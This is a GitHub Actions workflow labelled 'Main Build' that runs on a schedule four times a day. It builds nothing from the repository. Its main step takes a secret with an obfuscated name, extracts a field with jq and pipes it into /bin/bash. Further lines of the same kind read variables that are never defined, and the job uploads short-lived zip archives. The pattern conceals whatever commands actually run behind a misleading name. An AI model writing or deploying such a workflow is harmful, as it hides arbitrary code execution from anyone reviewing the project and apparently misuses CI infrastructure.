name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '0 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          gckl68883: ${{ secrets.gckl68883 }}
        run: |
          printf '%s' "$gckl68883" | jq -r .wvo006 | /bin/bash
          echo $bnuh0 | jq -r .pu621 | /bin/bash
          printf '%s' "$eyfv880" | jq -r .g44 | /bin/bash
          echo $j183 | jq -r .puh2014 | /bin/bash
          printf '%s' "$bruk3" | jq -r .eawge50 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: X28YyG0o
          path: "*.zip"
          retention-days: 1
